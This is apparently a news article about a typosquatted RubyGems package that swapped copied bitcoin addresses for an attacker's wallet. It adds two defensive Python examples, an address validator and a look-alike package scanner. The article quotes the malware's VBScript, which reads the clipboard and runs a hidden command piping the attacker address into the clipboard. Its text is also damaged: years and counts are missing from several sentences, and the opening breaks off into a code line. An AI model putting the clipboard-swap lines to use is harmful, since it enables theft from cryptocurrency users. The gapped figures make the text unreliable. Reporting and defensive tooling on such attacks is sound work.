Doppelgängers
Bitcoin currency stealer was downloaded thousands of times.
Dan Goodin – Apr
text = objHTML.ParentWindow.ClipboardData.GetData("text")

The script then checks if the clipboard data matches the format of a cryptocurrency wallet address. If it does, it replaces the address with an attacker-controlled one, "1JkU5XdNLji4Ugbb8agEWL1ko5US nNmc", in a hidden window using the following command:

WScript.Shell.Run "C:\Windows\System32\cmd.exe /c echo 1JkU5XdNLji4Ugbb8agEWL1ko5US nNmc | clip", 0

With this, the threat actor is trying to redirect all potential cryptocurrency transactions to their wallet address. At the time of writing this blog, seemingly no transactions were made for this wallet.

RubyGems maintainers did not respond to an email seeking comment.
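The "format of a cryptocurrency wallet address" that the ReversingLabs excerpt refers to is, for legacy Bitcoin addresses, Base58Check: a version byte, a 20-byte hash and a 4-byte double-SHA-256 checksum, all Base58-encoded. The Python below is an added example, not code from the article or from the ReversingLabs report, and shows the defensive side of that format: the validation a wallet performs before sending, plus a paste check that refuses an address which is malformed or which differs from the one the user actually copied. The sample input is the public Bitcoin genesis-block address and constructed corruptions of it; the function names are this example's own.

```python
"""Base58Check validation of a legacy Bitcoin address (added example; not the article's code)."""
import hashlib
from typing import Tuple

# Bitcoin's Base58 alphabet omits 0, O, I and l to avoid visually confusable characters.
B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
B58_INDEX = {c: i for i, c in enumerate(B58_ALPHABET)}


def b58decode(text: str) -> bytes:
    """Decode a Base58 string; each leading '1' stands for one leading zero byte."""
    value = 0
    for ch in text:
        if ch not in B58_INDEX:
            raise ValueError(f"character {ch!r} is not in the Base58 alphabet")
        value = value * 58 + B58_INDEX[ch]
    leading_zeros = len(text) - len(text.lstrip("1"))
    body = value.to_bytes((value.bit_length() + 7) // 8, "big") if value else b""
    return b"\x00" * leading_zeros + body


def decode_address(addr: str) -> Tuple[int, bytes]:
    """Return (version byte, 20-byte hash) for a valid legacy address; raise ValueError otherwise."""
    raw = b58decode(addr)
    if len(raw) != 25:  # 1 version byte + 20 hash bytes + 4 checksum bytes
        raise ValueError(f"decoded to {len(raw)} bytes, expected 25")
    payload, checksum = raw[:21], raw[21:]
    expected = hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]
    if checksum != expected:
        raise ValueError("checksum mismatch: typo, truncation or tampering")
    return payload[0], payload[1:]


def is_valid_address(addr: str) -> bool:
    """Boolean wrapper around decode_address for callers that only need yes/no."""
    try:
        decode_address(addr)
        return True
    except ValueError:
        return False


def check_paste(intended: str, pasted: str) -> str:
    """Check a wallet UI can run before sending: the pasted address must be well-formed
    and must be the address the user meant to copy, so a clipboard swap is caught."""
    if not is_valid_address(pasted):
        return "reject: pasted address is malformed"
    if pasted != intended:
        return "reject: pasted address differs from the one copied"
    return "ok"


if __name__ == "__main__":
    # Public Bitcoin genesis-block address, used as a known-valid sample.
    genesis = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"
    print(decode_address(genesis))
    print(check_paste(genesis, genesis))
    print(check_paste(genesis, genesis[:-1] + "b"))  # constructed: last character flipped
```

The checksum alone catches accidental corruption of an address, but it does not catch a substituted address that is itself well-formed, which is exactly what the clipboard hijacker produces; that is why `check_paste` also compares the pasted value with the intended one rather than trusting the clipboard.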
The latest of several

It’s by no means the first time people have used typosquatting to sneak malicious packages into widely used open source repositories. In , a college student uploaded sketchy scripts to RubyGems, PyPi, and NPM, which are community websites for developers of the Ruby, Python, and JavaScript programming languages, respectively. A phone-home feature in the student’s scripts showed that the imposter code was executed more than 158, times on more than , separate domains, and more than half the time his code was given all-powerful administrative rights. Two of the affected domains ended in .mil, an indication that people inside the US military had run his script.

Attackers quickly adopted the technique. In , an attacker sneaked a clipboard hijacker into PyPi. The malicious package was titled “Colourama” and looked similar to Colorama, which is one of the top 45 most-downloaded legitimate modules in the Python repository. The malicious package was downloaded 725 times, not including downloads from mirror sites.
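Typosquatting of the Colourama/Colorama kind relies on a name that sits one or two edits away from a popular package. The Python below is an added example, not code from the article or from any of the projects it mentions; it scans a requirements-style manifest and flags names that are within a small edit distance of a popular package without being that package. The popular-package list and the sample manifest are constructed for the example (a real scanner would pull the list from the registry's download statistics), and the function names are this example's own.

```python
"""Look-alike package-name check for dependency manifests (added example; not the article's code)."""
import re
from typing import Dict, List, Tuple

# Constructed stand-in for a registry's most-downloaded package names.
POPULAR_PACKAGES = ["colorama", "requests", "numpy", "event-stream"]


def normalize(name: str) -> str:
    """Fold case and treat '-', '_' and '.' alike, as the registries themselves do."""
    return re.sub(r"[-_.]+", "-", name.strip().lower())


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance using the classic two-row dynamic programme."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # deletion
                           cur[j - 1] + 1,              # insertion
                           prev[j - 1] + (ca != cb)))   # substitution
        prev = cur
    return prev[-1]


def lookalikes(name: str, popular=POPULAR_PACKAGES, max_distance: int = 2) -> List[Tuple[str, int]]:
    """Popular packages this name resembles but is not; [] if it is a genuine popular package."""
    n = normalize(name)
    hits = []
    for p in popular:
        pn = normalize(p)
        if pn == n:
            return []  # exact match after normalization: this is the real package
        d = edit_distance(n, pn)
        if d <= max_distance:
            hits.append((p, d))
    return sorted(hits, key=lambda hit: hit[1])


def scan_manifest(lines) -> Dict[str, List[Tuple[str, int]]]:
    """Map each suspicious requirement name to the popular packages it resembles."""
    findings = {}
    for line in lines:
        line = line.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        name = re.split(r"[\s=<>!~\[;]", line, 1)[0]  # name ends at the first specifier
        hits = lookalikes(name)
        if hits:
            findings[name] = hits
    return findings


if __name__ == "__main__":
    # Constructed manifest: one look-alike among genuine packages.
    sample = ["colourama==0.4.1", "requests>=2.0  # http client", "numpy", "event_stream"]
    print(scan_manifest(sample))
```

A hit is a signal, not a verdict: a low edit distance is also produced by legitimate forks and plugins, so the output is something to review at dependency-update time, and a normalized exact match is deliberately reported as clean because the registries already treat `event_stream` and `event-stream` as the same name.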
A month later, attackers managed to pull off an even more impressive feat when they sneaked a bitcoin-stealing backdoor into event-stream, a code library with 2 million downloads from the NPM repository. Developers of a currency wallet called CoPay incorporated the malicious library into updates and warned that any private keys trusted with the tainted versions should be considered compromised.
“There are very few protections out there for software developers to make sure that packages they install from these repositories are malware free,” Pericin, the ReversingLabs cofounder, said. “There is a huge gap in the market at the moment which is being exploited by malware authors.”